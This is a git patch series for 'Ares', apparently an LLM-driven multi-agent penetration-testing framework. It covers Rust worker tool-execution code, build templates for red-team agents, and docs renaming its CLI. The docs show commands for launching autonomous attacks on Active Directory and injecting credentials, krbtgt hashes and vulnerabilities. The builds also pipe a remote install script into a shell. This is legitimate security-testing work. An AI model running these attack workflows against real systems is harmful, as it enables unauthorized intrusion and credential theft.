{:?}", output.exit_code)) + }; + + // Parse structured discoveries from raw (unfiltered) tool output + let discoveries = ares_tools::parsers::parse_tool_output( + &request.tool_name, + &raw, + &request.arguments, + ); + let discoveries = if discoveries.as_object().is_none_or(|o| o.is_empty()) { + None + } else { + Some(discoveries) + }; + + // Emit discovery spans for observability + if let Some(ref disc) = discoveries { + if let Some(obj) = disc.as_object() { + for (disc_type, items) in obj { + let count = items.as_array().map(|a| a.len()).unwrap_or(0); + if count > 0 { + let span = trace_discovery( + disc_type, + &request.tool_name, + di.target_user.as_deref(), + None, + di.target_ip.as_deref(), + di.target_fqdn.as_deref(), + dt, + request.operation_id.as_deref(), + ); + let _guard = span.enter(); + } + } + } + } + + ToolExecResponse { + call_id: request.call_id.clone(), + output: combined, + error, + discoveries, + } + } + Err(e) => { + let err_str = e.to_string(); + // Track tools that fail because the binary is missing + if err_str.contains("failed to spawn") || err_str.contains("not installed") { + warn!( + tool = %request.tool_name, + "Tool binary not found — marking as unavailable for this session" + ); + unavailable_tools.insert(request.tool_name.clone()); + } + warn!( + tool = %request.tool_name, + call_id = %request.call_id, + err = %e, + "Tool execution failed" + ); + ToolExecResponse { + call_id: request.call_id.clone(), + output: String::new(), + error: Some(err_str), + discoveries: None, + } + } + }; + + let has_error = response.error.is_some(); + let result_key = format!("{TOOL_RESULT_PREFIX}:{}", request.call_id); + + match serde_json::to_string(&response) { + Ok(json) => { + if let Err(e) = push_result(conn, &result_key, &json).await { + error!( + call_id = %request.call_id, + "Failed to push tool result: {e}" + ); + } else { + debug!( + tool = %request.tool_name, + call_id = %request.call_id, + has_error = has_error, + "Tool result pushed" + ); + } + } + Err(e) => { + error!( + call_id = %request.call_id, + "Failed to serialize tool result: {e}" + ); + } + } +} + +/// LPUSH result and set TTL. +async fn push_result( + conn: &mut redis::aio::ConnectionManager, + result_key: &str, + result_json: &str, +) -> anyhow::Result<()> { + conn.lpush::<_, _, ()>(result_key, result_json).await?; + conn.expire::<_, ()>(result_key, RESULT_TTL).await?; + Ok(()) +} + +// ─── Tests ────────────────────────────────────────────────────────────────── + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn tool_exec_request_deserialize() { + let json = r#"{ + "call_id": "nmap_scan_abc123", + "task_id": "recon_def456", + "tool_name": "nmap_scan", + "arguments": {"target": "192.168.58.0/24"} + }"#; + let req: ToolExecRequest = serde_json::from_str(json).unwrap(); + assert_eq!(req.call_id, "nmap_scan_abc123"); + assert_eq!(req.tool_name, "nmap_scan"); + assert_eq!(req.task_id, "recon_def456"); + } + + #[test] + fn tool_exec_response_serialize() { + let resp = ToolExecResponse { + call_id: "nmap_scan_abc123".into(), + output: "Found 5 hosts".into(), + error: None, + discoveries: None, + }; + let json = serde_json::to_string(&resp).unwrap(); + assert!(json.contains("nmap_scan_abc123")); + assert!(json.contains("Found 5 hosts")); + // discoveries omitted when None + assert!(!json.contains("discoveries")); + } + + #[test] + fn tool_exec_response_with_error() { + let resp = ToolExecResponse { + call_id: "x".into(), + output: String::new(), + error: Some("Connection refused".into()), + discoveries: None, + }; + let json = serde_json::to_string(&resp).unwrap(); + let parsed: serde_json::Value = serde_json::from_str(&json).unwrap(); + assert_eq!(parsed["error"], "Connection refused"); + } + + #[test] + fn tool_exec_response_with_discoveries() { + let resp = ToolExecResponse { + call_id: "nmap_abc".into(), + output: "scan output".into(), + error: None, + discoveries: Some(serde_json::json!({ + "hosts": [{"ip": "192.168.58.10", "services": ["445/tcp"]}] + })), + }; + let json = serde_json::to_string(&resp).unwrap(); + assert!(json.contains("discoveries")); + assert!(json.contains("192.168.58.10")); + } + + #[test] + fn redis_key_prefixes_match_orchestrator() { + // These must match tool_dispatcher.rs in ares-orchestrator + assert_eq!(TOOL_EXEC_PREFIX, "ares:tool_exec"); + assert_eq!(TOOL_RESULT_PREFIX, "ares:tool_results"); + } +} diff --git a/warpgate-templates/templates/ares-acl-agent/warpgate.yaml b/warpgate-templates/templates/ares-acl-agent/warpgate.yaml index 3e5c68c7..dfe92288 100644 --- a/warpgate-templates/templates/ares-acl-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-acl-agent/warpgate.yaml @@ -75,8 +75,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. -f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-blue-agent/warpgate.yaml b/warpgate-templates/templates/ares-blue-agent/warpgate.yaml index 2679cb74..3f0166c4 100644 --- a/warpgate-templates/templates/ares-blue-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-blue-agent/warpgate.yaml @@ -24,7 +24,7 @@ base: DEBIAN_FRONTEND: noninteractive TZ: UTC changes: - - ENTRYPOINT ["ares-worker"] + - ENTRYPOINT ["ares", "worker"] - ENV DEBIAN_FRONTEND=noninteractive - ENV TZ=UTC sources: @@ -47,8 +47,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. -f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-blue-lateral-analyst-agent/warpgate.yaml b/warpgate-templates/templates/ares-blue-lateral-analyst-agent/warpgate.yaml index 1b522225..90eea9c0 100644 --- a/warpgate-templates/templates/ares-blue-lateral-analyst-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-blue-lateral-analyst-agent/warpgate.yaml @@ -25,7 +25,7 @@ base: DEBIAN_FRONTEND: noninteractive TZ: UTC changes: - - ENTRYPOINT ["ares-worker"] + - ENTRYPOINT ["ares", "worker"] - ENV DEBIAN_FRONTEND=noninteractive - ENV TZ=UTC sources: @@ -72,8 +72,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. -f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-blue-threat-hunter-agent/warpgate.yaml b/warpgate-templates/templates/ares-blue-threat-hunter-agent/warpgate.yaml index 2537434a..1b4ba0b3 100644 --- a/warpgate-templates/templates/ares-blue-threat-hunter-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-blue-threat-hunter-agent/warpgate.yaml @@ -25,7 +25,7 @@ base: DEBIAN_FRONTEND: noninteractive TZ: UTC changes: - - ENTRYPOINT ["ares-worker"] + - ENTRYPOINT ["ares", "worker"] - ENV DEBIAN_FRONTEND=noninteractive - ENV TZ=UTC sources: @@ -72,8 +72,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. -f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-blue-triage-agent/warpgate.yaml b/warpgate-templates/templates/ares-blue-triage-agent/warpgate.yaml index e6f2daed..99bc7f9e 100644 --- a/warpgate-templates/templates/ares-blue-triage-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-blue-triage-agent/warpgate.yaml @@ -25,7 +25,7 @@ base: DEBIAN_FRONTEND: noninteractive TZ: UTC changes: - - ENTRYPOINT ["ares-worker"] + - ENTRYPOINT ["ares", "worker"] - ENV DEBIAN_FRONTEND=noninteractive - ENV TZ=UTC sources: @@ -72,8 +72,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. -f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-cli/warpgate.yaml b/warpgate-templates/templates/ares-cli/warpgate.yaml index d7bd7955..c54a166f 100644 --- a/warpgate-templates/templates/ares-cli/warpgate.yaml +++ b/warpgate-templates/templates/ares-cli/warpgate.yaml @@ -23,7 +23,7 @@ base: DEBIAN_FRONTEND: noninteractive TZ: UTC changes: - - ENTRYPOINT ["ares-cli"] + - ENTRYPOINT ["ares"] - ENV DEBIAN_FRONTEND=noninteractive - ENV TZ=UTC sources: @@ -50,8 +50,8 @@ provisioners: - export PATH="/root/.cargo/bin:$PATH" - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-cli - - cp /tmp/ares-build/ares-rust/target/release/ares-cli /usr/local/bin/ares-cli + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-coercion-agent/warpgate.yaml b/warpgate-templates/templates/ares-coercion-agent/warpgate.yaml index 77f360db..83f0b3f9 100644 --- a/warpgate-templates/templates/ares-coercion-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-coercion-agent/warpgate.yaml @@ -74,8 +74,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. -f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-cracker-agent-gpu/warpgate.yaml b/warpgate-templates/templates/ares-cracker-agent-gpu/warpgate.yaml index c03facad..2523cae8 100644 --- a/warpgate-templates/templates/ares-cracker-agent-gpu/warpgate.yaml +++ b/warpgate-templates/templates/ares-cracker-agent-gpu/warpgate.yaml @@ -61,8 +61,8 @@ provisioners: - curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y --default-toolchain stable - export PATH="/root/.cargo/bin:$PATH" - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - rm -rf /tmp/ares-build /root/.cargo /root/.rustup /usr/local/bin/x86_64-unknown-linux-gnu-gcc - rm -f /var/lib/apt/lists/lock /var/cache/apt/archives/lock /var/lib/dpkg/lock* - apt-get purge -y build-essential pkg-config libssl-dev || true diff --git a/warpgate-templates/templates/ares-cracker-agent/warpgate.yaml b/warpgate-templates/templates/ares-cracker-agent/warpgate.yaml index f3d75b9e..c225dc7b 100644 --- a/warpgate-templates/templates/ares-cracker-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-cracker-agent/warpgate.yaml @@ -74,8 +74,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. -f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-credential-access-agent/warpgate.yaml b/warpgate-templates/templates/ares-credential-access-agent/warpgate.yaml index 3bde9962..d7a0ecf5 100644 --- a/warpgate-templates/templates/ares-credential-access-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-credential-access-agent/warpgate.yaml @@ -74,8 +74,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. -f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-lateral-movement-agent/warpgate.yaml b/warpgate-templates/templates/ares-lateral-movement-agent/warpgate.yaml index fbd9656f..c0aba4d5 100644 --- a/warpgate-templates/templates/ares-lateral-movement-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-lateral-movement-agent/warpgate.yaml @@ -75,8 +75,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. -f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-orchestrator/warpgate.yaml b/warpgate-templates/templates/ares-orchestrator/warpgate.yaml index 46095b41..15d715aa 100644 --- a/warpgate-templates/templates/ares-orchestrator/warpgate.yaml +++ b/warpgate-templates/templates/ares-orchestrator/warpgate.yaml @@ -25,7 +25,7 @@ base: DEBIAN_FRONTEND: noninteractive TZ: UTC changes: - - ENTRYPOINT ["ares-orchestrator"] + - ENTRYPOINT ["ares", "orchestrator"] - ENV DEBIAN_FRONTEND=noninteractive - ENV TZ=UTC sources: @@ -54,8 +54,8 @@ provisioners: - export PATH="/root/.cargo/bin:$PATH" - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-orchestrator - - cp /tmp/ares-build/ares-rust/target/release/ares-orchestrator /usr/local/bin/ares-orchestrator + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-privesc-agent/warpgate.yaml b/warpgate-templates/templates/ares-privesc-agent/warpgate.yaml index 84744f66..41d0d2b5 100644 --- a/warpgate-templates/templates/ares-privesc-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-privesc-agent/warpgate.yaml @@ -75,8 +75,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. -f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-recon-agent/warpgate.yaml b/warpgate-templates/templates/ares-recon-agent/warpgate.yaml index 3ea8ac89..84efe257 100644 --- a/warpgate-templates/templates/ares-recon-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-recon-agent/warpgate.yaml @@ -73,8 +73,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. -f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-worker/warpgate.yaml b/warpgate-templates/templates/ares-worker/warpgate.yaml index 43631fc7..7828f324 100644 --- a/warpgate-templates/templates/ares-worker/warpgate.yaml +++ b/warpgate-templates/templates/ares-worker/warpgate.yaml @@ -24,7 +24,7 @@ base: DEBIAN_FRONTEND: noninteractive TZ: UTC changes: - - ENTRYPOINT ["ares-worker"] + - ENTRYPOINT ["ares", "worker"] - ENV DEBIAN_FRONTEND=noninteractive - ENV TZ=UTC sources: @@ -47,8 +47,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. -f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 From 187ca7c811399eecde7780e440b1e12082c33e3a Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 17 Apr 2026 08:57:55 -0600 Subject: [PATCH 02/10] fix: update ares binary references and adjust telemetry init for service commands Changed: - Updated documentation, default values, and task output to use ares worker instead of ares-worker for consistency with the new binary naming in Ansible Redis role and related docs - Modified ares-cli to skip global telemetry initialization when running the orchestrator or worker subcommands, ensuring correct telemetry setup for service commands and preventing duplicate initialization --- .taskfiles/red/Taskfile.yaml | 2 +- ansible/roles/redis/README.md | 2 +- ansible/roles/redis/defaults/main.yml | 2 +- ares-cli/src/main.rs | 18 +++++++++++++----- 4 files changed, 16 insertions(+), 8 deletions(-) diff --git a/.taskfiles/red/Taskfile.yaml b/.taskfiles/red/Taskfile.yaml index 2f95e820..5725c694 100644 --- a/.taskfiles/red/Taskfile.yaml +++ b/.taskfiles/red/Taskfile.yaml @@ -796,7 +796,7 @@ tasks: echo "Monitor with:" echo " task ec2:logs EC2_NAME={{.EC2_NAME}} ROLE=orchestrator" echo " task ec2:redis:forward EC2_NAME={{.EC2_NAME}} # then:" - echo " ARES_REDIS_URL=redis://localhost:16379 ares-cli ops loot --latest" + echo " ARES_REDIS_URL=redis://localhost:16379 ares ops loot --latest" silent: false ignore_error: true diff --git a/ansible/roles/redis/README.md b/ansible/roles/redis/README.md index 4cc70d51..72e36f61 100644 --- a/ansible/roles/redis/README.md +++ b/ansible/roles/redis/README.md @@ -21,7 +21,7 @@ Redis server for Ares worker message broker | `redis_maxmemory` | str | 256mb | No description | | `redis_maxmemory_policy` | str | allkeys-lru | No description | | `redis_install_ares_worker_unit` | bool | True | No description | -| `redis_ares_worker_binary` | str | /usr/local/bin/ares-worker | No description | +| `redis_ares_worker_binary` | str | /usr/local/bin/ares worker | No description | | `redis_ares_log_dir` | str | /var/log/ares | No description | | `redis_ares_config_dir` | str | /etc/ares | No description | | `redis_verify_install` | bool | False | No description | diff --git a/ansible/roles/redis/defaults/main.yml b/ansible/roles/redis/defaults/main.yml index fe7f6a00..1280c507 100644 --- a/ansible/roles/redis/defaults/main.yml +++ b/ansible/roles/redis/defaults/main.yml @@ -7,7 +7,7 @@ redis_maxmemory_policy: "allkeys-lru" # Ares worker configuration redis_install_ares_worker_unit: true -redis_ares_worker_binary: "/usr/local/bin/ares-worker" +redis_ares_worker_binary: "/usr/local/bin/ares worker" redis_ares_log_dir: "/var/log/ares" redis_ares_config_dir: "/etc/ares" diff --git a/ares-cli/src/main.rs b/ares-cli/src/main.rs index a59305a1..c037b2fa 100644 --- a/ares-cli/src/main.rs +++ b/ares-cli/src/main.rs @@ -57,11 +57,19 @@ async fn main() { } // ── Initialize telemetry before using tracing macros ── - // This must happen before any tracing calls below. - let _telemetry = ares_core::telemetry::init_telemetry( - ares_core::telemetry::TelemetryConfig::new("ares-cli") - .with_default_filter("warn,ares_cli=info"), - ); + // Skip for orchestrator/worker subcommands — they init their own telemetry + // with the correct service name. + let is_service_subcommand = std::env::args() + .nth(1) + .is_some_and(|a| a == "orchestrator" || a == "worker"); + let _telemetry = if !is_service_subcommand { + Some(ares_core::telemetry::init_telemetry( + ares_core::telemetry::TelemetryConfig::new("ares-cli") + .with_default_filter("warn,ares_cli=info"), + )) + } else { + None + }; if let Some(ref source) = secrets_from { match source.as_str() { From 5c6a9db0a1d1d0f48badcd73e95757ef6de36309 Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 17 Apr 2026 09:13:30 -0600 Subject: [PATCH 03/10] refactor: update all references to ares-cli to unified ares binary **Changed:** - Replaced all documentation and code references from `ares-cli` to `ares` to reflect migration to a single unified binary. Updated CLI usage examples, architecture diagrams, and deployment instructions in `.gemini/agents/ares-operator.md`, `AGENTS.md`, `README.md`, `docs/blue.md`, `docs/red.md`, and related docs. - Updated project structure and crate descriptions in `.github/CONTRIBUTING.md` to describe the unified binary model (CLI, orchestrator, and worker). - Adjusted Taskfiles and build output messages in `.taskfiles/blue/Taskfile.yaml`, `.taskfiles/red/Taskfile.yaml`, `.taskfiles/remote/Taskfile.yaml`, and `Taskfile.yaml` to use the `ares` binary instead of `ares-cli`. - Revised all code comments, help output, and user-facing messages in `ares-cli/src/blue/submit.rs`, `ares-cli/src/ops/backfill.rs`, `ares-cli/src/orchestrator/blue/auto_submit.rs`, `ares-cli/src/orchestrator/blue/investigation.rs`, `ares-cli/src/orchestrator/mod.rs`, and `ares-core/src/lib.rs` to reference `ares` instead of `ares-cli`. - Updated documentation paths and references to code locations in `docs/blue.md` and `docs/red.md` to match the new unified crate structure (e.g., orchestrator and worker code now under `ares-cli`). - Modified infrastructure and deployment docs (`docs/infrastructure.md`) and Docker Compose templates to invoke the correct binary and entrypoints. - Clarified crate layout and tool build script references in `tools.yaml` to reflect the unified build process. --- .gemini/agents/ares-operator.md | 88 +++++++++---------- .github/CONTRIBUTING.md | 6 +- .taskfiles/blue/Taskfile.yaml | 6 +- .taskfiles/red/Taskfile.yaml | 6 +- .taskfiles/remote/Taskfile.yaml | 2 +- AGENTS.md | 84 +++++++++--------- README.md | 76 ++++++++-------- Taskfile.yaml | 4 +- ares-cli/src/blue/submit.rs | 2 +- ares-cli/src/ops/backfill.rs | 2 +- ares-cli/src/orchestrator/blue/auto_submit.rs | 2 +- .../src/orchestrator/blue/investigation.rs | 2 +- ares-cli/src/orchestrator/mod.rs | 2 +- ares-core/src/lib.rs | 2 +- docs/blue.md | 50 +++++------ docs/grafana_mcp_usage.md | 2 +- docs/infrastructure.md | 26 +++--- docs/red.md | 18 ++-- tools.yaml | 2 +- 19 files changed, 191 insertions(+), 191 deletions(-) diff --git a/.gemini/agents/ares-operator.md b/.gemini/agents/ares-operator.md index 87c0239c..51bf6763 100644 --- a/.gemini/agents/ares-operator.md +++ b/.gemini/agents/ares-operator.md @@ -12,14 +12,14 @@ model: gemini-1.5-pro max_turns: 40 --- -You operate a distributed multi-agent penetration testing system called Ares. The system runs on remote infrastructure (K8s cluster or EC2 instance) — you drive it from the local machine via `ares-cli` or Taskfile commands. +You operate a distributed multi-agent penetration testing system called Ares. The system runs on remote infrastructure (K8s cluster or EC2 instance) — you drive it from the local machine via `ares` or Taskfile commands. ## Architecture ``` Local (this machine) Remote (K8s or EC2) ──────────────────── ─────────────────── -ares-cli --k8s / --ec2 → ares-orchestrator (LLM coordination loop) +ares --k8s / --ec2 → ares-orchestrator (LLM coordination loop) or `task` commands ares-worker x7 (recon, credential_access, cracker, acl, privesc, lateral, coercion) Redis (state store + message broker) @@ -29,9 +29,9 @@ The orchestrator and workers are autonomous LLM agents. You don't control them d ## Two Deployment Targets -**K8s** (primary): Use `ares-cli --k8s ` or `task red:multi:*` commands. Auto-detects deployment name (`ares-orchestrator` for red, `ares-blue-orchestrator` for blue). +**K8s** (primary): Use `ares --k8s ` or `task red:multi:*` commands. Auto-detects deployment name (`ares-orchestrator` for red, `ares-blue-orchestrator` for blue). -**EC2** (alternative): Use `ares-cli --ec2 ` or `task ec2:*` commands. Resolves instance by Name tag, executes via AWS SSM. +**EC2** (alternative): Use `ares --ec2 ` or `task ec2:*` commands. Resolves instance by Name tag, executes via AWS SSM. ### Global CLI Flags @@ -78,8 +78,8 @@ IMPORTANT: After code changes, ALWAYS deploy before testing. Use `task remote:ch # via Taskfile (convenience wrappers) task red:multi TARGET=dreadgoad DOMAIN=sevenkingdoms.local -# via ares-cli (direct) -ares-cli ops submit dreadgoad contoso.local \ +# via ares (direct) +ares ops submit dreadgoad contoso.local \ --username administrator --password P@ssw0rd \ --model gpt-5.2 --max-steps 200 --follow @@ -91,11 +91,11 @@ task ec2:launch DOMAIN=sevenkingdoms.local TARGETS=192.168.58.10 ```bash # Direct CLI with transport (preferred) -ares-cli --k8s ares-red ops status --latest -ares-cli --k8s ares-red ops loot --latest --watch 10 --diff -ares-cli --k8s ares-red ops tasks --latest --status failed -ares-cli --k8s ares-red ops queue # Check Redis queue state -ares-cli --k8s ares-red ops list +ares --k8s ares-red ops status --latest +ares --k8s ares-red ops loot --latest --watch 10 --diff +ares --k8s ares-red ops tasks --latest --status failed +ares --k8s ares-red ops queue # Check Redis queue state +ares --k8s ares-red ops list # Taskfile wrappers task red:multi:status LATEST=true @@ -109,34 +109,34 @@ When natural progression stalls, inject state to skip past blockers: ```bash # Inject a known credential -ares-cli --k8s ares-red ops inject-credential op-xxx administrator P@ssw0rd --domain contoso.local +ares --k8s ares-red ops inject-credential op-xxx administrator P@ssw0rd --domain contoso.local # Inject an NTLM hash -ares-cli --k8s ares-red ops inject-hash op-xxx krbtgt "hash..." --domain contoso.local --aes-key "..." +ares --k8s ares-red ops inject-hash op-xxx krbtgt "hash..." --domain contoso.local --aes-key "..." # Inject a foreign domain host or domain SID -ares-cli --k8s ares-red ops inject-host op-xxx 192.168.58.20 dc01.fabrikam.local -ares-cli --k8s ares-red ops inject-domain-sid op-xxx --domain fabrikam.local --sid "S-1-5-..." +ares --k8s ares-red ops inject-host op-xxx 192.168.58.20 dc01.fabrikam.local +ares --k8s ares-red ops inject-domain-sid op-xxx --domain fabrikam.local --sid "S-1-5-..." # Inject a vulnerability (e.g., delegation, esc1) -ares-cli --k8s ares-red ops inject-vulnerability op-xxx constrained_delegation 192.168.58.20 \ +ares --k8s ares-red ops inject-vulnerability op-xxx constrained_delegation 192.168.58.20 \ --account-name svc_sql --domain fabrikam.local ``` ### Reports & Playbooks ```bash -ares-cli --k8s 